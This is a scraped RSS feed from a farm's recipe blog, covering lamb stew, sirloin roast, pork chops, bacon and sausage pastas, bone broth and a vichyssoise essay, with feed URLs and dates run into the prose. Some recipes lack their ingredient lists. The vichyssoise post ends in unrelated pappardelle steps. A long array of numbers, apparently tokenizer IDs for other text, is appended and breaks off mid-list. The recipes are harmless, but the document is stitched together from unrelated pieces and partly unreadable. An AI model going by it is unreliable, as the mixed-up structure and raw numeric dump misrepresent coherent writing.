vegetables and little time, so consider this recipe a helpful baseline for future experimentation. I started by reading Alice Waters’ recommendations for stew as well as Julia Child’s notes on lamb in a variation on Boeuf Bourguinon and Civet de Mouton, then peered in the veggie drawer and made do! All the meat and veg used below came from local DC farmers markets. If you’re fortunate enough to have hoarded some of Next Step Produce’s barley this goes very well over that, or other barley, or with amazing crusty bread or over some Smith Meadows fresh noodles. Pat the lamb cubes dry and season lightly with salt and pepper, hours or the night before if you think of it. While they absorb seasoning and come to room temperature, chop the vegetables into large bite-sized pieces. They need to not cook too quickly and also not be cumbersome in the finished product. Heat a cast iron pot that has a lid over medium heat with the bacon fat. Sear the lamb cubes in batches so that they’re not crowded. Tongs are best for this. Place them in a large mixing bowl as they finish. Do the same with the vegetables, just enough to get a little extra flavor into them. Place these in the mixing bowl with the lamb for the moment. This all takes a little while! Add a little more bacon fat if needed but try not to wind up with a puddle at the end- this can be poured off as needed at the risk of losing a bit of flavor. You can also roast the whole shebang in the oven but then you don’t get the benefits of the next step… Deglaze the pot with the wine, scrape up any stuck bits of meat and vegetable and let it simmer for a minute to cook down a little. Add the broth and bring back to a simmer. Carefully scoop all the lamb and vegetables back into the pot. The liquid should not quite cover it all, add a bit more broth or water as needed. Also add the garlic, herbs and spices (experiment with flavors here!) and a bit of salt and pepper. Bring it all back to a very, very low simmer, place the lid on slightly askew so some steam may escape, and set a timer for two hours. If the stew boils too hard the broth will become cloudy and we don’t want that. Give the lamb cubes a bit of a poke- they should be just starting to fall apart. Salt and pepper to taste and that’s it! Serve with your absorbent carb of choice. ]]>http://smithmeadows.com/kitchen/lamb-root-stew/feed/06378http://smithmeadows.com/kitchen/lamb-root-stew/Crock Pot Sirloin Tip Roasthttp://feedproxy.google.com/~r/smithmeadows/~3/rNg4govOImE/ http://smithmeadows.com/kitchen/crock-pot-sirloin-tip-roast/#respondTue, 31 Jan 2017 23:22:29 +0000http://new.smithmeadows.com/?p=6262We're all so busy these days juggling work and family and life! This recipe is incredibly easy to prep and leave while you get on with things and come back to a comforting, hearty dinner. It comes from the kitchen of Andrea Dove, one of our wonderful employees who is a farmer, photographer and mother. Beef [...] We’re all so busy these days juggling work and family and life! This recipe is incredibly easy to prep and leave while you get on with things and come back to a comforting, hearty dinner. It comes from the kitchen of Andrea Dove, one of our wonderful employees who is a farmer, photographer and mother. Beef Sirloin Tip Roast in the Crock Pot (serves family of 3-4) 1 Smith Meadows Beef Sirloin Tip Roast, 2-3 lbs Cayenne pepper Montreal steak seasoning Oregano Italian seasoning Minced onion Salt and pepper to taste 1/2 red onion, diced as desired 2 celery stalks, diced to 1/2 inch Other diced veg like tomatoes, carrots, potatoes… Place the (defrosted) sirloin tip roast in the crock pot Lightly drizzle the top of the sirloin tip roast with all the spices and herbs listed above (to your preference. Remember cayenne pepper is spicy!) Place the diced red onion on top of the roast Place the celery around the roast, along with any other diced vegetables Place lid on crock pot and cook on HIGH for 5-7 hours The results will be a delicious and tender beefy roast that will fall apart on your fork! The broth it creates can be cooked down a bit into a hearty beef gravy for mashed potatoes. You know our bone-in pork chops are juicy and flavorful, so why not double down! Grab a 2-3 pound pork tenderloin roast from us at market to cut your own super-thick or custom sized boneless chops. Our pork tends to be fairly lean, since the hogs are trotting back and forth on pasture all day, so we didn’t see a need to trim the roast. Plus we know that pastured pork is much higher in natural omega-3s from eating all that forage, and that nutritional benefit to you comes via the fat. See Nancy’s post on pork lard here. Interestingly, the original recipe for these chops mentioned using “natural pork” which we usually assume is just greenwashing. In this case it actually referred to the difference with “enhanced” pork, which has been injected with a salt and preservative solution. The enhanced stuff doesn’t brown and has dull flavor. Our pork is definitely not enhanced. No hormones, no antibiotics, no preservatives, no nonsense. Chops can be paired with all sorts of things, so we’ll leave that up to you. Here we simply baked a spaghetti squash and topped it with butter and fresh ground pepper, sauteed some purple kale (Gardener’s Gourmet) with garlic and grated cheese on top, and whipped up an apple/red wine/balsamic sauce for the chops. Chops would also go great with a few of our ravioli, butternut squash comes to mind, or maybe bacon sage? Pan-Seared Thick Cut Pork Chops Original recipe from Cooks Illustrated 1 2-3 lb Smith Meadows pasture-raised pork tenderloin roast dash of salt and pepper 2 tablespoons high heat vegetable oil Place a cast iron skillet big enough to hold as many chops as you’re making in the oven. Turn oven to 500F and let the pan heat completely. Note: if you don’t usually heat your oven this hot your smoke alarm may go off! Prep your sides while you wait, start anything like squash or potatoes. Meanwhile, cut your roast into even sized pieces as thick as you’d like. I actually used a (washable) ruler to get 1.5″ chops. Salt and pepper chops on both sides. Try smoked salt if you have it handy. Carefully, with thick oven mitts, remove skillet from the oven and place over high heat on the stovetop. Add the oil and heat until just smoking. Boil water for pasta at this point. Add chops to the pan with tongs so you can place them where you want them without moving them around. Cook on the first side for 2 minutes until nicely browned, then flip. Keep flipping, adjust the heat as needed, two minutes on each side until a thermometer reads 120-125 degrees F and exterior is darker brown and crispy. Do not leave the chops for too long on a side or they will overcook. At this point the chops are not yet completely cooked- remove them from the skillet and place on a plate under foil for 10-15 minutes. This is called “carryover cooking”- the chops will continue to heat until they are about 140 degrees F. They should be light pink in the centers when done. Fire any quick-cooking sides while the chops rest on the plate- sauteed greens take ~5 min, ravioli boil in 2 min. ]]>http://smithmeadows.com/kitchen/thick-cut-boneless-pork-chops/feed/36244http://smithmeadows.com/kitchen/thick-cut-boneless-pork-chops/Comfort Food Recipe- Bacon and Pasta!http://feedproxy.google.com/~r/smithmeadows/~3/OeR4NstzTC0/ http://smithmeadows.com/kitchen/comfort-food-recipe-bacon-and-pasta/#respondSat, 21 Jan 2017 00:50:33 +0000http://new.smithmeadows.com/?p=6218Need something warm and comforting for dinner? When in doubt, BACON. This bears some similarity to our sausage and pasta recipe- frankly we eat a lot of meat+pasta+veg. I mean, what else is there? Next week will be a roast, promise! This recipe originated here, and then changed a bit. Add a small salad if you [...] Need something warm and comforting for dinner? When in doubt, BACON. This bears some similarity to our sausage and pasta recipe– frankly we eat a lot of meat+pasta+veg. I mean, what else is there? Next week will be a roast, promise! This recipe originated here, and then changed a bit. Add a small salad if you need more to your meal! 1/2 package of Smith Meadows Noodles- I used Winter Wheat and Oat this time but whichever you like! Cook the bacon in a cast iron skillet until crispy, place on paper towel to absorb extra grease and then crumble. Pour off all but 2 tablespoons of the fat from pan. Heat over moderate flame and add the onions. Cook until slightly browned and starting to soften. Bring a pot of water to a boil for the pasta. Add in parsnips, broth, vinegar, brown sugar and pepper flakes (I chopped a dried pepper from my garden, it turned out a little on the hot side). Stir until the sugar is dissolved and parsnips have softened up a bit. Add in half the bacon and all of the collards, toss to wilt and combine, let simmer to reduce the broth to a sauce. While the veg is simmering a bit, toss the pasta in the boiling water for two minutes, then drain. Add pasta to veg pan and toss everything together- you should have just enough liquid between extra water on the pasta and bacon flavored broth to give everything a little sauce without being soupy. Portion into dishes or serve in a nice big pasta bowl! ]]>http://smithmeadows.com/kitchen/comfort-food-recipe-bacon-and-pasta/feed/06218http://smithmeadows.com/kitchen/comfort-food-recipe-bacon-and-pasta/Master Recipe- Sausage and Pastahttp://feedproxy.google.com/~r/smithmeadows/~3/SuIibNH5ltw/ http://smithmeadows.com/kitchen/master-recipe-sausage-and-pasta/#respondFri, 13 Jan 2017 17:50:46 +0000http://new.smithmeadows.com/?p=6198Have you ever found yourself staring into the fridge wondering what to do with all that Smith Meadows sausage and fresh pasta? This week it was pork sage sausage and spelt and oat pasta... Have you ever found yourself staring into the fridge wondering what to do with all that Smith Meadows sausage and fresh pasta? One of my favourite things is making a simple pan sauce from the sausage and tossing it with whichever variety of noodles Nancy made that week. This week it was pork sage sausage (our newest addition!) and spelt and oat pasta (which we have every week). You can make any number of variations to this recipe, including tossing in some greens with the pasta as it boils or other veg (carrots, brussels sprouts, greens, peppers…) with the onions and sausage. Using a broth to deglaze the pan will give you a nice simple sauce flavor to complement the herb sausages (add some fresh herbs of your own!) or you can try using a beer with our kielbasa or bratwurst. Cooking will emphasize the flavours of the beer so go for something malty rather than hoppy. I’m also including a recipe for a Warm Winter Vegetable Salad below, because it’s really easy and will go with the noodles! Plus it’s Whole 30 compatible. Sausage and pan sauce over fresh noodles (2 moderate servings) 2 tbl butter 1 large onion, thinly sliced 2 Smith Meadows sausages 10 ounces broth (veg, chicken, or turkey) or beer, like a lager 1/2 package fresh Smith Meadows noodles In a large heavy skillet, preferably cast iron, melt the butter and sauté the onions over medium heat until translucent Add the sausage to the pan and brown on each side for a few minutes (add some heartier veg here if you choose) Pour your liquid of choice over the sausage and onions, scraping the bottom of the pan a bit. Bring to a boil, then reduce heat and simmer until liquid is reduced, about 25 minutes, until it’s more sauce-like and a bit thickened. (add greens here if cooking with sausage) Meanwhile, bring a pot of water to a boil for the pasta. When your sausage liquid is reduced to a reasonable amount to coat the pasta with, drop the noodles (and greens, if you like them more wilted) into the boiling water, stir, and cook for 2 minutes. Drain noodles in a colander and place in serving dish(es). Place sausages on the noodles and pour the pan sauce and onions over everything. Toss to coat and serve with a salad if you didn’t add vegetables while cooking! Warm Winter Vegetable Salad (2 servings) Thanks to Martha Stewart for the original recipe! This dressing mellows with a little age, and it makes enough to last for several days. Having tried cooking the veg by boiling and steaming I’d recommend steaming, which retains more nutrients and uses less water. Vegetables: 1 pint Brussels sprouts 2 cups of chopped carrots 1 med red potato or sweet potato to equal about 1 cup chopped Substitute and add any veg you like! Cauliflower? Broccoli? Squash? 2 scallions, chopped Dressing (1.5 cups): 1 Smith Meadows egg 2 tbl dijon mustard 3 tbl cider vinegar 1 tbl celery seed (I used coriander, ground with a mortar and pestle) 3/4 cup olive oil salt and pepper to taste Combine the egg, mustard, vinegar and celery/coriander in a mixing bowl. While whisking constantly (the whisk attachment on my immersion blender is great for this) slowly add the oil until the dressing is thick. Salt and pepper to taste. Boil enough water to cover vegetables or to work with your preferred steaming method. Clean and chop your vegetables and add them in order of cooking time- potatoes first, then carrots, Brussels sprouts at the last minute so they stay crunchy! Drain and place the vegetables in your serving dish(es) and pour as much dressing as you like over it. Save any extra in the fridge for up to a week. Garnish with chopped scallions and serve! Now that we’re entering the chilly season, many market customers have been asking if we’ll sell broth again this year. We previously sold a broth made from our beef and turkey bones- it may yet reappear! In the meantime, here’s my basic beef bone broth recipe: Note: If you don’t have a slow cooker, a pot on the stove will do and 4 hours will get you a nice broth. The longer steep time leaches more minerals from the bones and tends to result in a more gelatinous broth. A sample of our beef soup bones- each pack is different, often some knuckles and collagen rich pieces with a little meat on them. Turn oven to 350F and start a kettle of water boiling. Arrange beef bones in a Pyrex baking dish that will hold them with a little room to spare Trim (or not) and quarter a large onion and stud it with cloves (see photo). Arrange it around the beef bits in the baking dish. Pop the whole shebang in the oven for around 30 min, until the edges of things look browned. Remove from oven and immediately deglaze using the wine or vinegar (ie pour it into/over the bones and shake things a bit). Scrape everything including the stuck bits in the bottom of the baking dish into your slow cooker (mine is just a 4 qt, 5 qt would be a little better) and cover with the boiled water. Bring to a boil/steady bubbling on high and then turn your slow cooker to low for about 24 hours. Turn slow cooker off and let cool a bit so it’s easier to handle. Place a strainer large enough to hold the bones over a pyrex or metal bowl large enough for the liquid and pour contents of slow cooker through. Shake the strainer a bit to get all the liquid out. Discard the remnants. Cover and let the broth cool, then place in the fridge until any fat has solidified on top, a few hours. Simply crack and pry up the fat, scraping broth off the underside, and reserve it for cooking with (I keep mine frozen)! Depending on the batch of bones, your broth may be somewhat or very jiggly (see a sample below)! Either scoop or pour into smaller containers or ice cube trays, refrigerate for up to one week or freeze. Enjoy! ]]>http://smithmeadows.com/kitchen/beef-bone-broth-recipe/feed/06096http://smithmeadows.com/kitchen/beef-bone-broth-recipe/It’s the Newest Trend: Early Summer Vichyssoise!http://feedproxy.google.com/~r/smithmeadows/~3/WVJaJ7r2J74/ http://smithmeadows.com/farm/its-the-newest-trend-early-summer-vichyssoise/#respondFri, 24 Jun 2016 10:33:01 +0000http://new.smithmeadows.com/?p=5988"Smith Meadows & Smithfield Farm, Hold Please..." Socializing in a farming community is a little different than the visual parade of trend setters that populate many of the farmers markets Smith Meadows attends. On Mondays at the farm the array of colorful people and their accessories are replaced by the quieter splendor of what's in the [...] Socializing in a farming community is a little different than the visual parade of trend setters that populate many of the farmers markets Smith Meadows attends. On Mondays at the farm the array of colorful people and their accessories are replaced by the quieter splendor of what’s in the fields. The banter of weekend shoppers is muted. Farmers and cooks converse on how to translate this splendor into physical and psychological sustenance for the following weekend. “Pot pies didn’t sell that well this weekend. I think the season is over. Do you want to add cold minestrone to the list for this week?” “You’re right. I’ll text Shawna and see what’s available. Zucchini might be in, but there are no tomatoes yet and onions are still small.” Hi Shawna, I wanted to order ingredients for minestrone. I know it’s a long shot, but let me know what you have and I can tailor the recipe. After an hour or so of paperwork, I turn to my phone to see what Oak Hart Farm’s owner, Shawna, has sent in reply. Good Morning Nancy, I have onions but they are the size of golf balls. Zukes and tomatoes are just coming in, but I do have cabbage, broccoli, fennel, kale, collards and salad turnips. Let me think on those and get back to you later today. Thanks! Turnips, Collards and Fennel, OH MY! I like collards, turnips and fennel, but getting trend setters to try them is challenging. How do you combine nutritionally dense, low calorie, organic produce into eye candy for the world weary market shopper? I dream of something that everyone in my house would eat. It needs to make the day easier for a busy mom with much more on my to do list than dinner. In this way, the farming community is no different than any other group of adults. My son would not touch collards on their own. I tried boiled turnips once and told him they were white beets. He was three and still remembers it. Fennel tastes too much like licorice for my husband, which never fails to wrinkle his nose. Tough crowd at my house- not unlike farmers market shoppers. What to do? How about Vichyssoise? It’s creamy, it involves butter, it can be eaten cold and it goes well with empanadas or roasted sausage. Now how do I make this with turnips, fennel and collards as the main ingredients. I’m not sure yet, but I place my order with Oak Hart for my co-worker to pick up on her way to our farm. Julia Childs- “First you take the turnip…” I have a happy memory of Vichyssoise. One of my best friend’s served it at her bridal shower. It felt sophisticated to eat something we had always made fun of as children for its ridiculous sound. As young adults we thought, “My, how far we’ve come. Let us eat Vichyssoise!” It’s basically cold potato soup that’s full of onions, leeks, and cream. As I search through Mother Earth, Food 52 and Running with Tweezers’ various renditions, I settle on something that fits what I have on my kitchen table. I take the high turnip ratio from Mother Earth, refine it with the butter of Food 52, spice it up with the nutmeg & cayenne of Running with Tweezers and add my own panache. I also look at Julia Child’s recipe for Potage aux Cresson for good measure. How does it taste? My business partner’s response sums it up… “It’s good. It’s very Irish. I like it.” “Enough heat?” “Yes! I think it will taste even better cold.” After reading Tim Carman’s insightful article in the Washington Post, as well as the positive comments from our loyal customers, I felt I had to do something new this week. It’s not to please the trend setters or create a new lifestyle choice. It’s because pot pie season was over. It’s because turnips, collards and fennel are in plentiful supply with the veggie farmer I talk to every week. More importantly, it’s because I want something that would work with my busy and picky family. Building community is more than showing up on a Saturday in your new sandals and sunhat. It’s making something work with what you have around you. I have the good fortune of having amazing farmers, fertile land and intelligent customers. This is why I make Early Summer Vichyssoise. Try it! You’ll love it and check out what else we have this week from our kitchen! Bring a large pot of water to boil and add 2 small handfuls of salt. Wash and chop the kale into ribbons the same width as the papardelle. Put the stems aside. Place the sautéed onions, roasted pistachios, lemon juice, lemon zest, 2 TBSPS olive oil, salt and kale stems into a food processor. Chop until you get a chunky consistency that suits your palate. Once the water comes to a boil, throw the kale in first. Wait 15-30 seconds. Add the papardelle. Cook for two minutes. Drain the pasta. Toss with the pistachio pesto and the cream or more olive oil. If it is too dry, add the broth or reserved pasta water. Sprinkle with crushed red pepper and/or cracked Szechuan pepper and freshly grated parmesan cheese. Serve with a glass of chardonnay and follow up with a winter salad of greens, fennel, grapefruit and olive oil!
[ 1, 23089, 11801, 29889, 739, 30010, 29879, 7375, 29892, 372, 30010, 29879, 19587, 411, 11757, 800, 29892, 2358, 574, 1847, 278, 16423, 29892, 5264, 27010, 4110, 29892, 5505, 1584, 664, 29889, 887, 817, 1554, 4780, 304, 867, 453, 29991, 1334, 19417, 1361, 29891, 29892, 697, 282, 618, 9741, 310, 1749, 367, 1389, 413, 774, 370, 29914, 26050, 556, 13630, 267, 29892, 7960, 304, 367, 1766, 262, 630, 322, 805, 638, 287, 363, 4780, 7984, 292, 29889, 2688, 30010, 276, 22707, 322, 1584, 368, 5700, 29892, 1269, 3577, 6839, 304, 367, 3307, 363, 1023, 3348, 886, 29889, 13, 13, 6295, 29991, 21595, 7535, 701, 777, 15129, 12461, 515, 596, 25448, 1887, 17888, 322, 679, 7984, 292, 29991, 1334, 1304, 2319, 3104, 20452, 29892, 6709, 373, 1080, 29892, 503, 1682, 305, 2172, 29914, 2083, 1050, 10674, 1161, 322, 22623, 1236, 2496, 29889, 450, 10489, 867, 453, 1304, 1244, 338, 2998, 304, 367, 7375, 357, 297, 278, 1250, 322, 12528, 261, 297, 278, 4565, 29892, 577, 1438, 18109, 17538, 526, 6411, 8362, 16205, 411, 380, 18245, 631, 12461, 763, 373, 1080, 373, 278, 7375, 357, 4038, 322, 1236, 22437, 373, 278, 12528, 261, 29889, 19320, 596, 867, 453, 29889, 13, 13, 7032, 599, 1766, 1099, 311, 2348, 1127, 10070, 297, 263, 9687, 21433, 470, 1999, 1581, 2745, 10597, 29889, 1394, 521, 459, 1407, 2691, 322, 528, 1296, 763, 540, 384, 297, 263, 286, 1658, 14631, 29991, 306, 1304, 278, 2319, 9687, 21433, 26305, 373, 590, 5198, 4455, 1999, 1581, 29889, 13, 13, 22150, 1766, 1099, 311, 322, 367, 1389, 13630, 267, 297, 263, 12580, 29880, 393, 756, 263, 17343, 29892, 28189, 411, 263, 805, 6150, 470, 805, 271, 2497, 304, 24296, 29889, 830, 1341, 4087, 403, 472, 3203, 29871, 29896, 29899, 29906, 6199, 29892, 28189, 292, 263, 7303, 3064, 29889, 13, 13, 1451, 459, 599, 596, 18655, 1849, 408, 366, 763, 963, 363, 18109, 17538, 29899, 2823, 20612, 363, 3407, 541, 1348, 1023, 29899, 29890, 568, 269, 1891, 521, 18801, 29889, 8142, 345, 278, 503, 1682, 305, 2172, 29892, 769, 22780, 297, 29871, 29896, 297, 305, 12785, 29889, 751, 4254, 373, 1080, 29889, 323, 2209, 297, 263, 5004, 12580, 29880, 411, 288, 9258, 17182, 29892, 10849, 368, 5962, 1236, 2496, 322, 15795, 304, 21779, 29889, 2803, 1886, 1022, 1048, 29871, 29941, 29900, 1375, 29889, 13, 13, 26772, 367, 1389, 714, 310, 278, 1424, 5525, 322, 3244, 11480, 18109, 17538, 29892, 12558, 5807, 12981, 368, 26325, 287, 313, 351, 475, 29892, 1074, 20612, 363, 3407, 467, 3967, 304, 2381, 15705, 701, 777, 310, 278, 1766, 1099, 311, 408, 366, 2125, 963, 714, 310, 278, 12580, 29880, 29889, 19152, 278, 18109, 17538, 373, 263, 15284, 304, 2125, 304, 278, 867, 453, 322, 1235, 963, 2041, 304, 5716, 10430, 29889, 27811, 278, 4805, 1766, 1099, 311, 29991, 13, 13, 1123, 11666, 18109, 556, 292, 1889, 411, 18655, 1849, 373, 5004, 18109, 17538, 29889, 13, 13, 3868, 271, 701, 278, 867, 453, 29991, 438, 309, 278, 867, 403, 29889, 8561, 7535, 7375, 322, 18350, 20542, 3138, 338, 8210, 363, 596, 10489, 29914, 3090, 1111, 284, 867, 453, 29889, 13, 13, 29925, 473, 9886, 1766, 1099, 311, 964, 263, 4320, 13977, 470, 916, 7243, 373, 278, 380, 586, 300, 459, 322, 7984, 1623, 964, 263, 8310, 29891, 29889, 6803, 964, 263, 8310, 29891, 13006, 470, 15905, 261, 304, 1209, 2820, 278, 1591, 411, 278, 592, 284, 29889, 13, 13, 22150, 367, 1389, 975, 278, 7375, 357, 4038, 310, 596, 867, 453, 29889, 15484, 18655, 519, 18109, 17538, 297, 278, 12528, 261, 10640, 29889, 17278, 29892, 14712, 1432, 29871, 29946, 6233, 2745, 367, 1389, 28975, 29871, 29896, 29906, 29900, 14496, 383, 363, 18350, 10812, 313, 473, 29303, 511, 1048, 3006, 6233, 29889, 15154, 367, 1389, 515, 278, 867, 453, 322, 12033, 411, 1701, 309, 29889, 2866, 14150, 7984, 292, 12461, 363, 29871, 29945, 1375, 901, 470, 2745, 2309, 29889, 13, 13, 29903, 7459, 278, 367, 1389, 322, 12461, 1283, 1009, 18067, 18109, 17538, 1250, 964, 5941, 12580, 3137, 322, 1320, 2666, 304, 715, 1078, 29892, 470, 9080, 373, 278, 18109, 17538, 29991, 13, 13, 5262, 29958, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 29872, 8995, 29899, 3034, 262, 630, 29899, 1655, 557, 29899, 26050, 17538, 29914, 18798, 29914, 29900, 29896, 29947, 29946, 29945, 29941, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 29872, 8995, 29899, 3034, 262, 630, 29899, 1655, 557, 29899, 26050, 17538, 29914, 1576, 4385, 669, 402, 5288, 20657, 4634, 310, 278, 8413, 1050, 29899, 10507, 1124, 597, 18798, 14701, 29889, 3608, 29889, 510, 24629, 29878, 29914, 3844, 389, 1004, 23626, 24629, 29941, 29914, 29934, 29916, 29950, 29918, 16033, 29887, 29929, 1433, 29947, 29914, 13, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29888, 2817, 29914, 4018, 29899, 3820, 314, 20657, 29899, 19264, 29899, 15641, 1050, 29899, 13236, 8484, 21032, 29903, 348, 29892, 29871, 29906, 29953, 1085, 29871, 29906, 29900, 29896, 29955, 29871, 29906, 29941, 29901, 29946, 29906, 29901, 29941, 29955, 718, 29900, 29900, 29900, 29900, 1124, 597, 1482, 29889, 3844, 389, 1004, 23626, 29889, 510, 13401, 29886, 29922, 29953, 29946, 29906, 29945, 3112, 29915, 29879, 17644, 2998, 393, 2215, 4056, 338, 263, 21626, 29878, 1230, 26818, 29892, 12234, 21676, 363, 22588, 29899, 842, 2153, 29892, 7793, 26549, 583, 29892, 322, 278, 2181, 504, 12239, 310, 278, 7568, 29899, 7283, 504, 29889, 25086, 1048, 372, 29889, 360, 26810, 289, 6090, 526, 29871, 29955, 29945, 29995, 20118, 880, 669, 29871, 29906, 29945, 29995, 6276, 264, 29936, 6909, 1838, 29915, 29873, 6548, 373, 10697, 29892, 541, 372, 947, 6548, 7812, 714, 310, 278, 5962, 29889, 3750, 15982, 1048, 4192, 1774, 29879, 746, 366, 508, 376, 5675, 372, 17251, 29908, 21945, 13, 13, 5262, 29958, 3112, 30010, 29879, 17644, 2998, 393, 2215, 4056, 338, 263, 21626, 29878, 1230, 26818, 29892, 12234, 21676, 363, 22588, 29899, 842, 2153, 29892, 7793, 26549, 583, 29892, 322, 278, 2181, 504, 12239, 310, 278, 7568, 29899, 7283, 504, 29889, 25086, 1048, 372, 29889, 360, 26810, 289, 6090, 526, 29871, 29955, 29945, 29995, 20118, 880, 669, 29871, 29906, 29945, 29995, 6276, 264, 29936, 6909, 1838, 30010, 29873, 6548, 373, 10697, 29892, 541, 372, 947, 6548, 7812, 714, 310, 278, 5962, 29889, 3750, 15982, 1048, 4192, 1774, 29879, 746, 366, 508, 1346, 5675, 372, 17251, 30024, 10940, 366, 864, 29973, 3834, 2305, 1348, 366, 505, 304, 367, 9885, 29891, 304, 367, 263, 2215, 1050, 29892, 541, 1244, 30010, 29879, 385, 1663, 1241, 6872, 29901, 366, 508, 18890, 582, 552, 596, 9885, 565, 366, 12020, 15100, 313, 29946, 15100, 1251, 267, 29897, 470, 27127, 1169, 313, 29946, 30098, 1532, 29892, 366, 1073, 467, 530, 2715, 28920, 29892, 727, 526, 3023, 29899, 29500, 17184, 874, 599, 975, 278, 4940, 545, 363, 3889, 29991, 1939, 697, 508, 27754, 393, 2215, 13269, 505, 372, 1754, 29889, 13, 13, 11008, 338, 727, 263, 380, 1657, 521, 21475, 373, 590, 2343, 29973, 3872, 30010, 29873, 2244, 592, 29892, 2244, 281, 538, 307, 915, 29889, 13, 13, 2776, 3236, 29892, 14332, 8571, 267, 278, 871, 2655, 901, 2600, 8270, 1135, 2215, 4056, 338, 5007, 29889, 6811, 1332, 295, 2168, 491, 1183, 261, 9667, 29892, 4946, 1907, 505, 10325, 9078, 278, 1353, 310, 8041, 6068, 304, 367, 4223, 10067, 943, 29889, 2860, 599, 29892, 411, 599, 278, 970, 5220, 292, 363, 278, 16930, 29892, 920, 1033, 263, 9227, 451, 1207, 14746, 29973, 10056, 596, 1887, 772, 1691, 29892, 19500, 2820, 4726, 297, 1009, 19231, 3588, 13876, 29892, 1652, 314, 19415, 10835, 2243, 314, 4056, 22309, 10940, 896, 5625, 29876, 29899, 5872, 3113, 29889, 1205, 1018, 451, 304, 367, 1444, 20521, 29889, 1094, 278, 2030, 5934, 5771, 29892, 1346, 10310, 30010, 29873, 379, 403, 278, 7412, 29893, 1266, 29892, 379, 403, 278, 8448, 3178, 13, 13, 2059, 1286, 29892, 306, 1073, 825, 366, 30010, 276, 3117, 7291, 29901, 1346, 29956, 340, 29991, 450, 871, 2655, 901, 3144, 314, 20657, 1135, 1641, 263, 2215, 1050, 470, 263, 9227, 1818, 367, 29299, 278, 1023, 8530, 28518, 366, 30010, 29881, 367, 29889, 1126, 445, 321, 1631, 561, 1384, 1795, 3275, 366, 304, 263, 16667, 15997, 29901, 1346, 3644, 871, 306, 471, 9885, 29891, 3307, 304, 505, 263, 330, 12552, 344, 964, 445, 8261, 322, 10135, 352, 681, 3186, 29892, 590, 289, 8253, 2834, 723, 1735, 22296, 8530, 13, 13, 29943, 2267, 451, 29892, 5089, 29875, 1248, 417, 29875, 29889, 910, 2215, 1050, 29899, 13236, 756, 596, 1250, 313, 29876, 711, 793, 344, 704, 27084, 322, 825, 1333, 467, 306, 471, 1083, 513, 287, 310, 590, 560, 568, 5264, 4660, 10325, 746, 306, 4520, 263, 19797, 297, 278, 10524, 313, 3116, 29893, 29892, 13442, 330, 17741, 338, 278, 2656, 310, 2655, 393, 5930, 304, 2215, 1050, 29899, 8231, 414, 599, 278, 931, 14366, 515, 278, 4700, 1551, 29925, 579, 545, 29889, 510, 29892, 6943, 385, 29192, 23550, 30010, 28015, 300, 29901, 13, 13, 29937, 1397, 277, 13, 13, 2887, 5276, 29892, 445, 19797, 2996, 515, 1551, 19793, 545, 29892, 263, 4700, 988, 2215, 1050, 29899, 8231, 414, 763, 6142, 378, 7642, 403, 304, 6232, 1663, 5861, 964, 3907, 1584, 901, 6909, 29892, 322, 1641, 1584, 901, 3144, 314, 20657, 1135, 591, 2307, 526, 29889, 313, 29902, 1073, 29892, 2898, 304, 4658, 30098, 541, 6456, 29892, 445, 338, 1663, 1241, 2130, 29991, 467, 5853, 10816, 29892, 591, 5353, 5837, 304, 437, 445, 1550, 29263, 15006, 15075, 475, 2197, 5129, 265, 4940, 545, 30010, 29889, 960, 366, 1303, 1546, 278, 3454, 29892, 366, 508, 3117, 10115, 825, 306, 30010, 29885, 2869, 9963, 1048, 1244, 29901, 402, 5607, 29928, 29889, 887, 1073, 29892, 763, 298, 905, 292, 1737, 968, 393, 6568, 22843, 29808, 29892, 285, 908, 29879, 310, 29735, 411, 22843, 9115, 687, 267, 29892, 2646, 1327, 292, 289, 913, 29879, 491, 1009, 22843, 25341, 29879, 29892, 2992, 1696, 2992, 29889, 13, 13, 29940, 1337, 635, 29892, 2861, 304, 590, 9667, 292, 5264, 20410, 29892, 306, 6041, 9566, 920, 28007, 763, 445, 508, 1371, 278, 3109, 5162, 348, 403, 29889, 5674, 29892, 1244, 30010, 29879, 263, 7773, 29899, 29887, 1025, 6872, 363, 366, 29901, 6093, 6732, 17687, 1254, 11499, 399, 29923, 9851, 9094, 8519, 323, 2891, 9818, 29979, 383, 21661, 29991, 2193, 30010, 29879, 1492, 29892, 599, 366, 505, 304, 437, 338, 2828, 278, 1544, 29892, 322, 372, 674, 377, 3873, 366, 3448, 304, 301, 7004, 5577, 310, 278, 2756, 6092, 296, 322, 10135, 352, 681, 29889, 1763, 2367, 366, 263, 4060, 310, 825, 366, 30010, 645, 1284, 29892, 1244, 30010, 29879, 263, 15373, 29899, 404, 388, 310, 592, 297, 590, 4148, 28015, 300, 29994, 23261, 10135, 352, 681, 29892, 302, 905, 29994, 392, 5007, 1048, 278, 23820, 10664, 5129, 265, 30010, 1551, 19793, 545, 29889, 13, 13, 29911, 5086, 263, 4832, 297, 305, 22473, 4559, 29889, 2193, 7136, 3430, 4359, 408, 1781, 408, 592, 29991, 13, 13, 29956, 768, 292, 373, 263, 752, 520, 282, 488, 29889, 9817, 7684, 29892, 23052, 29991, 13, 13, 3596, 1048, 29735, 29889, 21223, 1781, 297, 590, 1551, 19793, 545, 4148, 28015, 300, 29892, 1584, 515, 5742, 29991, 13, 13, 2517, 6751, 590, 2215, 4056, 29899, 16554, 6909, 599, 472, 2748, 30098, 739, 6858, 1716, 6567, 29991, 13, 13, 29956, 768, 292, 373, 263, 2594, 29876, 29889, 315, 6146, 26549, 583, 763, 304, 679, 1880, 29889, 13, 13, 3373, 3802, 411, 17888, 10703, 29889, 3617, 278, 1298, 29973, 13, 13, 2951, 263, 1020, 2801, 29889, 2193, 17439, 9493, 292, 3438, 395, 29945, 29892, 29900, 29900, 29900, 29892, 541, 306, 471, 599, 763, 5129, 29882, 4992, 4319, 914, 1016, 30010, 29873, 2562, 16412, 13, 13, 5328, 1048, 592, 5007, 373, 263, 14842, 289, 744, 29973, 8413, 714, 29991, 13, 13, 10605, 306, 626, 5007, 1048, 282, 23379, 29889, 2193, 30010, 29879, 599, 29892, 925, 5007, 1048, 282, 23379, 29889, 13, 13, 28173, 5941, 4094, 30098, 450, 2125, 21694, 338, 5051, 2821, 29889, 13, 13, 6816, 669, 590, 875, 283, 6617, 29889, 13, 13, 29954, 13536, 1073, 596, 5534, 2791, 1691, 29889, 2266, 29892, 306, 30010, 29885, 472, 278, 2215, 13269, 30010, 9999, 29889, 13, 13, 2855, 7146, 29892, 445, 338, 592, 411, 